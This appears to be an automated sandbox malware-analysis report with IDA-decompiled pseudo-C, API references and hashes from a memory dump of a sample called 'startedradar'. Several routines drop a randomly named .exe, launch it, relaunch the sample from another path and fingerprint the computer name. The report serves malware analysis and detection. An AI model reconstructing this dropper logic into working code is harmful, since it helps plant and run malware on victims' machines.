0x002a24f0
0x002a24f4
0x002a24fa
0x002a24fd
0x002a24ff
0x002a2510
0x002a2516
0x002a251b
0x002a25c5
0x002a2521
0x002a2521
0x002a2526
0x002a2528
0x002a2528
0x002a2530
0x002a253d
0x002a2544
0x002a2547
0x002a254b
0x002a254c
0x002a254e
0x002a2552
0x002a2566
0x002a2568
0x002a256d
0x002a257f
0x002a2583
0x00000000
0x002a2585
0x002a2585
0x002a258a
0x002a258b
0x002a258c
0x002a258d
0x002a258e
0x002a258f
0x002a2590
0x002a2591
0x002a2592
0x002a2593
0x002a2594
0x002a2595
0x002a2596
0x002a2597
0x002a259d
0x002a25a2
0x002a25a7
0x002a25a7
0x002a25a2
0x002a2583
0x002a25ae
0x002a25b3
0x002a25b4
0x002a25bd
0x002a25bd
0x002a25c8
0x002a25cd
0x002a25d0
0x002a25d0
0x002a25dc
0x002a25e2
0x002a25e4
0x002a25d0
0x002a25f5

APIs

lstrlenW.KERNEL32(00000004), ref: 002A24F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A2509
RtlAllocateHeap.NTDLL(00000000), ref: 002A2510
lstrcpyW.KERNEL32(00000000,00000004), ref: 002A2530
lstrlenW.KERNEL32(00000004), ref: 002A2537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002A2560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A2572
RtlAllocateHeap.NTDLL(00000000), ref: 002A2579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A25D5
HeapFree.KERNEL32(00000000), ref: 002A25DC

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: 050232610982e4018ba90980e9d68a67fe62df296fc7af2245e279c1ffa47d59
Instruction ID: 7b566e1ad51424fbf27a8111916bd9f87165e9649856951cc6fe91e8514eccf7
Opcode Fuzzy Hash: 050232610982e4018ba90980e9d68a67fe62df296fc7af2245e279c1ffa47d59
Instruction Fuzzy Hash: 69114F71901726EFDB219FE8ECDCB6A77ACFF09744B440564AA01DB211DF709D088BA1

Uniqueness

Uniqueness Score: 1.85%

Function 002B0500, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
memorysynchronizationUNIQUE

C-Code - Quality: 79%

			E002B0500() {
				void* _t7;
				int _t8;
				void* _t18;
				void* _t19;

				_t19 =  *0x2b6d5c;
				_t18 = 0x2b6d5c;
				if(_t19 != 0) {
					do {
						_t8 =  *(_t19 + 8);
						if(_t8 == 1 || _t8 == 2) {
						}
						if(_t8 != 3) {
							L8:
							if(0 == 0) {
								_t18 = _t19;
								goto L11;
							}
							goto L9;
						} else {
							_t8 = WaitForSingleObject( *(_t19 + 0x14), 0);
							if(_t8 != 0) {
								goto L8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t19 + 0x10))))( *(_t19 + 0xc), _t8, _t8);
							VirtualFree( *(_t19 + 0xc), 0, 0x8000);
							CloseHandle( *(_t19 + 0x14));
							L9:
							 *_t18 =  *_t19;
							_t8 = HeapFree(GetProcessHeap(), 0, _t19);
						}
						L11:
						_t19 =  *_t18;
					} while (_t19 != 0);
					return _t8;
				}
				return _t7;
			}

0x002b0501
0x002b0508
0x002b050f
0x002b0512
0x002b0512
0x002b051a
0x002b051a
0x002b0529
0x002b055f
0x002b0561
0x002b0579
0x00000000
0x002b0579
0x00000000
0x002b052b
0x002b0530
0x002b0538
0x00000000
0x00000000
0x002b0542
0x002b054e
0x002b0557
0x002b0563
0x002b0568
0x002b0571
0x002b0571
0x002b057b
0x002b057b
0x002b057d
0x00000000
0x002b0581
0x002b0584

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 002B0530
VirtualFree.KERNEL32(?,00000000,00008000), ref: 002B054E
CloseHandle.KERNEL32(?), ref: 002B0557
GetProcessHeap.KERNEL32(00000000,?), ref: 002B056A
HeapFree.KERNEL32(00000000), ref: 002B0571

Strings

\m+, xrefs: 002B0508

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID: \m+
API String ID: 797926041-3859341932
Opcode ID: 416bea39939881c2bbbe32af3cc5486b3c353654f04e5fd141157b15e652c7ca
Instruction ID: 0ab0943b87f895e3c5914b15f3da4d5a619a1a00c5a51c24f3e98aed70684ff9
Opcode Fuzzy Hash: 416bea39939881c2bbbe32af3cc5486b3c353654f04e5fd141157b15e652c7ca
Instruction Fuzzy Hash: 56018C316207129FDB324F98AC88B6BB7A8FF04750BA44A19E942DB961C361AC609F50

Uniqueness

Uniqueness Score: 100.00%

Function 002B000F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46
stringfileCOMMON

C-Code - Quality: 16%

			E002B000F(WCHAR* __eax, intOrPtr __ecx) {
				int _t35;
				int _t36;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t54;
				void* _t56;

				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				 *((intOrPtr*)(_t56 - 8)) = __ecx;
				lstrcpyW(__eax, ??);
				_t48 = lstrlenW(_t56 - 0x268);
				 *((short*)(_t56 + _t48 * 2 - 0x268)) = 0x5c;
				_t49 = _t48 + 1;
				_t54 = (GetTickCount() & 0x0000000f) + 4;
				L002A1FD0( &((_t56 - 0x268)[_t49]), _t54);
				 *((intOrPtr*)(_t56 - 4)) = 0xcc;
				_t50 = _t49 + _t54;
				 *((intOrPtr*)(_t56 + _t50 * 2 - 0x268)) = 0x65002e;
				 *((intOrPtr*)(_t56 + _t50 * 2 - 0x264)) = 0x650078;
				 *((short*)(_t56 + _t50 * 2 - 0x260)) = 0;
				_t35 = CreateFileW(_t56 - 0x268, 0x40000000, 0, 0, 2, 0x80, 0);
				_t51 = _t35;
				if(_t51 != 0xffffffff) {
					goto 0x5a1f30;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t36 = WriteFile();
					_t35 = CloseHandle(_t51);
					if(_t36 != 0) {
						goto 0x5a1f4b;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t56 - 0x60) = 0x44;
						_t35 = CreateProcessW(_t56 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t56 - 0x60, _t56 - 0x18);
						if(_t35 != 0) {
							CloseHandle( *(_t56 - 0x18));
							_t35 = CloseHandle( *(_t56 - 0x14));
						}
					}
				}
				goto 0x5a1f61;
				asm("int3");
				return _t35;
			}

0x002b0011
0x002b0012
0x002b0013
0x002b0014
0x002b0015
0x002b0016
0x002b0017
0x002b001d
0x002b0030
0x002b0037
0x002b003f
0x002b0054
0x002b0059
0x002b0060
0x002b0069
0x002b006f
0x002b007a
0x002b0085
0x002b0099
0x002b009f
0x002b00a4
0x002b00a6
0x002b00ab
0x002b00ac
0x002b00ad
0x002b00ae
0x002b00af
0x002b00b0
0x002b00b1
0x002b00b2
0x002b00b3
0x002b00bc
0x002b00c4
0x002b00c6
0x002b00cb
0x002b00cc
0x002b00cd
0x002b00ce
0x002b00d7
0x002b00fb
0x002b0103
0x002b0108
0x002b0111
0x002b0111
0x002b0103
0x002b00c4
0x002b0117
0x002b011c
0x002b011d

APIs

lstrcpyW.KERNEL32 ref: 002B001D
lstrlenW.KERNEL32(?), ref: 002B002A
GetTickCount.KERNEL32 ref: 002B0040
CreateFileW.KERNEL32(0065002E,40000000), ref: 002B0099

Strings

., xrefs: 002B006F
x, xrefs: 002B007A

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CountCreateFileTicklstrcpylstrlen
String ID: .$x
API String ID: 3921185036-1654958672
Opcode ID: e340719af0b786541e23e43bc4c1244b3c8c14a97a55078d73f52aa0a9d095c4
Instruction ID: 1abafde68d25482d09480a828093dbfa0cdac97285222e48c8aed346eb20dbca
Opcode Fuzzy Hash: e340719af0b786541e23e43bc4c1244b3c8c14a97a55078d73f52aa0a9d095c4
Instruction Fuzzy Hash: 1901F7759146599FD7609F60EC4CBAE3664BF04354F2447A5E80AD72A0DF318D45CB90

Uniqueness

Uniqueness Score: 3.75%

Function 002AFEEF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
memorystringUNIQUE

C-Code - Quality: 54%

			E002AFEEF(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t16;
				int _t21;
				void* _t25;
				void* _t31;
				void* _t33;
				void* _t36;
				void* _t45;

				_t45 = __eflags;
				_t31 = __edi;
				_t25 = __ecx;
				memset(??, ??, ??);
				GetModuleFileNameW(0, 0x2b83f8, 0x104);
				_push(_t25);
				_t33 = L002A1C60(0x2b4360, 0x2f8, __esi);
				L002AF610(0x2b7cd0, _t33);
				E002AF6F0(HeapFree(GetProcessHeap(), 0, _t33), _t33, _t31, _t33);
				L002AF900(L002AF870(), _t33);
				L002AF770(0x2b7cd0, _t33, _t45);
				_t16 = lstrcmpiW(0x2b83f8, 0x2b7ee0);
				if(_t16 != 0) {
					L002AFB80(0x2b7cd0);
					__eflags =  *0x2b63cc;
					if( *0x2b63cc == 0) {
						goto 0x5a1ede;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t36 - 0x58) = 0x44;
						_t21 = CreateProcessW(0x2b7ee0, 0, 0, 0, 0, 0, 0, 0, _t36 - 0x58, _t36 - 0x10);
						__eflags = _t21;
						if(_t21 != 0) {
							CloseHandle( *(_t36 - 0x10));
							_t21 = CloseHandle( *(_t36 - 0xc));
						}
						goto 0x5a1ef4;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						return _t21;
					} else {
						L002AFD90(0x2b7cd0, _t33);
						return 1;
					}
				} else {
					return _t16;
				}
			}

0x002afeef
0x002afeef
0x002afeef
0x002afef1
0x002aff06
0x002aff0c
0x002aff1f
0x002aff28
0x002aff3d
0x002aff47
0x002aff4c
0x002aff5b
0x002aff63
0x002aff6a
0x002aff6f
0x002aff76
0x002aff87
0x002aff8c
0x002aff8d
0x002aff8e
0x002aff8f
0x002aff98
0x002affba
0x002affc0
0x002affc2
0x002affc7
0x002affd0
0x002affd0
0x002affd6
0x002affdb
0x002affdc
0x002affdd
0x002affde
0x002affdf
0x002aff78
0x002aff78
0x002aff86
0x002aff86
0x002aff65
0x002aff69
0x002aff69

APIs

memset.NTDLL ref: 002AFEF1
GetModuleFileNameW.KERNEL32(00000000,002B83F8,00000104), ref: 002AFF06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AFF30
HeapFree.KERNEL32(00000000), ref: 002AFF37
lstrcmpiW.KERNEL32(002B83F8,002B7EE0), ref: 002AFF5B

Strings

`C+, xrefs: 002AFF12

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FileFreeModuleNameProcesslstrcmpimemset
String ID: `C+
API String ID: 1471024059-3229546420
Opcode ID: 6ce3fff923df0268c621bda81300e2d28407ce9019f1e88df0d99ac6d54c1ada
Instruction ID: beebc59851af7f2a8266a35536d883f83f784db23c194e768cec659232c762fd
Opcode Fuzzy Hash: 6ce3fff923df0268c621bda81300e2d28407ce9019f1e88df0d99ac6d54c1ada
Instruction Fuzzy Hash: 1EF02830774211A7C2943BF8BD0F3AD36889B47B92F000175F80DD9192CDA908B08BB7

Uniqueness

Uniqueness Score: 100.00%

Function 002B0487, Relevance: 9.0, APIs: 6, Instructions: 32
memoryCOMMON

C-Code - Quality: 48%

			E002B0487(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t17;
				void* _t20;
				void* _t25;
				void* _t26;

				_t20 = __ecx;
				_t25 = L002A1D00(__ecx, 0xcc, __edi);
				 *0x2b59dc(_t26 - 0x428, 0x104, _t25, _t26 - 0x220);
				HeapFree(GetProcessHeap(), 0, _t25);
				_push(_t26 - 0x18);
				_push( *(_t26 - 8));
				_push(_t20);
				if(L002A1F00(_t26 - 0x428) != 0) {
					CloseHandle( *(_t26 - 0x18));
					CloseHandle( *(_t26 - 0x14));
				}
				_t17 = CloseHandle( *(_t26 - 8));
				goto 0x5a20e5;
				asm("int3");
				return _t17;
			}

0x002b0487
0x002b048e
0x002b04a4
0x002b04b7
0x002b04c0
0x002b04c1
0x002b04ca
0x002b04d5
0x002b04da
0x002b04e3
0x002b04e3
0x002b04ec
0x002b04f2
0x002b04f7
0x002b04f8

APIs

_snwprintf.NTDLL ref: 002B04A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002B04B0
HeapFree.KERNEL32(00000000), ref: 002B04B7
CloseHandle.KERNEL32(?), ref: 002B04DA
CloseHandle.KERNEL32(?), ref: 002B04E3
CloseHandle.KERNEL32(?), ref: 002B04EC

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CloseHandle$Heap$FreeProcess_snwprintf
String ID:
API String ID: 3500179031-0
Opcode ID: d4ec197b487071a7f8b23d0c565cddd7ca88197f3a4475ea33a61ec2966273f6
Instruction ID: aedfd1f767498ed6a20b21412d63295f8465559e9ca2e5281e0ca8f2b9bfd7ed
Opcode Fuzzy Hash: d4ec197b487071a7f8b23d0c565cddd7ca88197f3a4475ea33a61ec2966273f6
Instruction Fuzzy Hash: 16F01DB280051AEFCB116BE0EC4DFEE7B39AF04355F404551F606E5062DB318A64CFA0

Uniqueness

Uniqueness Score: 4.01%

Function 002AF8B4, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

C-Code - Quality: 51%

			E002AF8B4() {
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t7 = MapViewOfFile();
				if(_t7 != 0) {
					 *0x2b5a0c = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				CloseHandle(_t9);
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x002af8ba
0x002af8be
0x002af8d4
0x002af8d9
0x002af8d9
0x002af8e0
0x002af8e8
0x002af8f0

APIs

MapViewOfFile.KERNEL32 ref: 002AF8B4
GetFileSize.KERNEL32(?,00000000), ref: 002AF8C3
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 002AF8CD
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 002AF8D9
CloseHandle.KERNEL32 ref: 002AF8E0
CloseHandle.KERNEL32 ref: 002AF8E8

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 01f9cf70e6003d8d46860eae0bc4500b1f61a91247b2b6b5c87277a8ed8c1633
Instruction ID: 0d18e781bc7072961d8a2e22745d79e9e317e1cbce7424a3169b7352a08c0d7d
Opcode Fuzzy Hash: 01f9cf70e6003d8d46860eae0bc4500b1f61a91247b2b6b5c87277a8ed8c1633
Instruction Fuzzy Hash: F3E0B673200A21AFE6412FA5BC8CBAA7B6CFB49716F444226F60284161CB6948418B21

Uniqueness

Uniqueness Score: 0.01%

Function 00282F8A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97windowCOMMON

APIs

LoadIconA.USER32 ref: 00282FE3
LoadImageA.USER32 ref: 002830AA

Strings

MainMenu, xrefs: 00283036
0, xrefs: 00282FA3
MainWClass, xrefs: 00283030

Memory Dump Source

Source File: 00000008.00000002.1686354466.00280000.00000040.sdmp, Offset: 00280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_280000_startedradar.jbxd

Similarity

API ID: Load$IconImage
String ID: 0$MainMenu$MainWClass
API String ID: 666102371-1064549320
Opcode ID: 250ec310a1f0057771c96efbafbce3cbc620d1e8a2869495e74de09d563fbe00
Instruction ID: caca75f2d3523a542a551248d5cde5cce1e2be353ecb589f178bb15fa284b3cd
Opcode Fuzzy Hash: 250ec310a1f0057771c96efbafbce3cbc620d1e8a2869495e74de09d563fbe00
Instruction Fuzzy Hash: 854119B4D013198FDB14EFA8E84529EBBF4FB48304F10852AE919AB354D779A905CF91

Uniqueness

Uniqueness Score: 3.75%

Function 002AF90A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
memoryCOMMON

C-Code - Quality: 71%

			E002AF90A(DWORD* __eax, void* __esi) {
				void* _t15;
				intOrPtr _t20;
				void* _t21;
				int _t24;
				char _t27;
				void* _t33;
				void* _t37;
				void* _t39;
				void* _t41;

				_t36 = __esi;
				 *(_t39 - 4) = 0x10;
				if(GetComputerNameW(_t39 - 0x34, __eax) == 0) {
					L12:
					 *(_t39 - 0x14) = 0x58;
					L13:
					goto 0x5a1c88;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t15 = L002A1C60(_t32, 0xcc, _t36);
					_t37 = _t15;
					 *0x2b5858(0x2b80e8, 0x104, _t37, _t39 - 0x14,  *0x2b6d58);
					return HeapFree(GetProcessHeap(), 0, _t37);
				}
				_t33 = _t39 - 0x34;
				_t20 = E002A1350(_t33);
				_push(_t33);
				 *0x2b610c = _t20;
				_t32 = 0x2b3cc0;
				_t21 = L002A1C60(0x2b3cc0, 0x58, __esi);
				_t41 = _t41 + 4;
				_t36 = _t21;
				_t24 = WideCharToMultiByte(0, 0x400, _t39 - 0x34, 0xffffffff, _t39 - 0x14, 0x10, _t36, 0);
				HeapFree(GetProcessHeap(), 0, _t36);
				if((0 | _t24 > 0x00000000) == 0) {
					goto L12;
				}
				_t32 = _t39 - 0x14;
				if( *(_t39 - 0x14) == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t27 =  *_t32;
					if(_t27 < 0x30 || _t27 > 0x39) {
						if(_t27 < 0x61 || _t27 > 0x7a) {
							if(_t27 < 0x41 || _t27 > 0x5a) {
								 *_t32 = 0x58;
							}
						}
					}
					_t32 = _t32 + 1;
				} while ( *_t32 != 0);
				goto L13;
			}

0x002af90a
0x002af90a
0x002af91e
0x002af9ad
0x002af9ad
0x002af9b3
0x002af9b3
0x002af9b8
0x002af9b9
0x002af9ba
0x002af9bb
0x002af9be
0x002af9c9
0x002af9da
0x002af9f7
0x002af9f7
0x002af925
0x002af928
0x002af92d
0x002af933
0x002af938
0x002af93d
0x002af942
0x002af945
0x002af95d
0x002af974
0x002af97d
0x00000000
0x00000000
0x002af983
0x002af986
0x00000000
0x00000000
0x00000000
0x00000000
0x002af988
0x002af988
0x002af988
0x002af98c
0x002af994
0x002af99c
0x002af9a2
0x002af9a2
0x002af99c
0x002af994
0x002af9a5
0x002af9a6
0x00000000

APIs

GetComputerNameW.KERNEL32(?), ref: 002AF916
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 002AF95D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AF96D
HeapFree.KERNEL32(00000000), ref: 002AF974

Strings

X, xrefs: 002AF9AD

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$ByteCharComputerFreeMultiNameProcessWide
String ID: X
API String ID: 4005268116-3081909835
Opcode ID: 2b2c00fdd3b798ef48b207081f43f7ef0d1087085f6a2bcc4541d92083851e65
Instruction ID: 4c7ad577ca3bd8ba18d8a8a61bc6a3859e64c7236cc07daca76747ca874d9247
Opcode Fuzzy Hash: 2b2c00fdd3b798ef48b207081f43f7ef0d1087085f6a2bcc4541d92083851e65
Instruction Fuzzy Hash: BD11087196520B7BEB60AFD4AE48BEF3B68DF03310F140126E145F5091DE688A168B66

Uniqueness

Uniqueness Score: 3.75%

Function 002B0372, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45filestringCOMMON

APIs

lstrlenW.KERNEL32(?), ref: 002B0391
GetTickCount.KERNEL32 ref: 002B03A7
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 002B0408

Strings

., xrefs: 002B03D4
x, xrefs: 002B03E1

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CountCreateFileTicklstrlen
String ID: .$x
API String ID: 4247372160-1654958672
Opcode ID: 1b9e0970f54ad561f2e02ec6a5d3e7953902ecda6e8f6498e09c495e86e2a469
Instruction ID: e79b4b8ef581cc74b59a840c08a9f71f7fa572bb6037e37b74f7b2e0782762ad
Opcode Fuzzy Hash: 1b9e0970f54ad561f2e02ec6a5d3e7953902ecda6e8f6498e09c495e86e2a469
Instruction Fuzzy Hash: AD119671640718ABE7209FA0EC8DF9A3760BB08710F1446A4EA09EF2D1DB74DA058FC4

Uniqueness

Uniqueness Score: 3.75%

Function 002B0242, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
filestringCOMMON

C-Code - Quality: 23%

			E002B0242(void* __eax, void* __ecx) {
				int _t36;
				int _t37;
				void* _t43;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t54;
				void* _t57;

				_t43 = __ecx;
				 *0x2b5a94(0, 0x23, 0, 0, __eax);
				_t48 = lstrlenW(_t57 - 0x268);
				 *((short*)(_t57 + _t48 * 2 - 0x268)) = 0x5c;
				_t49 = _t48 + 1;
				_t54 = (GetTickCount() & 0x0000000f) + 4;
				L002A1FD0( &((_t57 - 0x268)[_t49]), _t54);
				_t50 = _t49 + _t54;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x268)) = 0x65002e;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x264)) = 0x650078;
				 *((short*)(_t57 + _t50 * 2 - 0x260)) = 0;
				 *((intOrPtr*)(_t57 - 4)) =  *((intOrPtr*)(_t43 + 4));
				_t36 = CreateFileW(_t57 - 0x268, 0x40000000, 0, 0, 2, 0x80, 0);
				_t51 = _t36;
				if(_t51 != 0xffffffff) {
					goto 0x5a2019;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t37 = WriteFile();
					_t36 = CloseHandle(_t51);
					if(_t37 != 0) {
						goto 0x5a2032;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t57 - 0x60) = 0x44;
						_t36 = CreateProcessW(_t57 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t57 - 0x60, _t57 - 0x14);
						if(_t36 != 0) {
							CloseHandle( *(_t57 - 0x14));
							_t36 = CloseHandle( *(_t57 - 0x10));
						}
					}
				}
				goto 0x5a2048;
				asm("int3");
				return _t36;
			}

0x002b0242
0x002b024d
0x002b0260
0x002b0267
0x002b026f
0x002b0284
0x002b0289
0x002b0290
0x002b029d
0x002b02aa
0x002b02b5
0x002b02c2
0x002b02d1
0x002b02d7
0x002b02dc
0x002b02de
0x002b02e3
0x002b02e4
0x002b02e5
0x002b02e6
0x002b02e7
0x002b02e8
0x002b02e9
0x002b02f2
0x002b02fa
0x002b02fc
0x002b0301
0x002b0302
0x002b0303
0x002b0304
0x002b030d
0x002b0331
0x002b0339
0x002b033e
0x002b0347
0x002b0347
0x002b0339
0x002b02fa
0x002b034d
0x002b0352
0x002b0353

APIs

lstrlenW.KERNEL32(?), ref: 002B025A
GetTickCount.KERNEL32 ref: 002B0270
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 002B02D1

Strings

., xrefs: 002B029D
x, xrefs: 002B02AA

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CountCreateFileTicklstrlen
String ID: .$x
API String ID: 4247372160-1654958672
Opcode ID: dbcfa9c90ea4f9a0b50f8ac7f25ff86beee5f198552567fd1340619425e3c7b5
Instruction ID: b41963449aad536baa6b665d493d1262409790ac3a2d772f0e6b8e7294c323b6
Opcode Fuzzy Hash: dbcfa9c90ea4f9a0b50f8ac7f25ff86beee5f198552567fd1340619425e3c7b5
Instruction Fuzzy Hash: 3001B572A44719ABE7609F60EC4DB9A3660BB04711F1407A4EA0AEF6E0DF719E45CB80

Uniqueness

Uniqueness Score: 3.75%

Function 002B00CE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E002B00CE() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x18);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x18));
					_t11 = CloseHandle( *(_t13 - 0x14));
				}
				goto 0x5a1f61;
				asm("int3");
				return _t11;
			}

0x002b00ce
0x002b00d7
0x002b00fb
0x002b0103
0x002b0108
0x002b0111
0x002b0111
0x002b0117
0x002b011c
0x002b011d

APIs

memset.NTDLL ref: 002B00CE
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 002B00FB
CloseHandle.KERNEL32(?), ref: 002B0108
CloseHandle.KERNEL32(?), ref: 002B0111

Strings

D, xrefs: 002B00D7

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 26765e1964a261abb2f4f71d7abde884e01c91ba34f659eddc8ebd0c1a6444c1
Instruction ID: dc5cc04f9bc96069049145e9bad2c60dbe2a8bc74878226bbcbe79f279ddb58f
Opcode Fuzzy Hash: 26765e1964a261abb2f4f71d7abde884e01c91ba34f659eddc8ebd0c1a6444c1
Instruction Fuzzy Hash: AAE0127280410EEFCB05AFE0EC8DBEE7BB8BB00305F004625E206EA061DB308954CB61

Uniqueness

Uniqueness Score: 0.08%

Function 002B0304, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E002B0304() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x14);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x14));
					_t11 = CloseHandle( *(_t13 - 0x10));
				}
				goto 0x5a2048;
				asm("int3");
				return _t11;
			}

0x002b0304
0x002b030d
0x002b0331
0x002b0339
0x002b033e
0x002b0347
0x002b0347
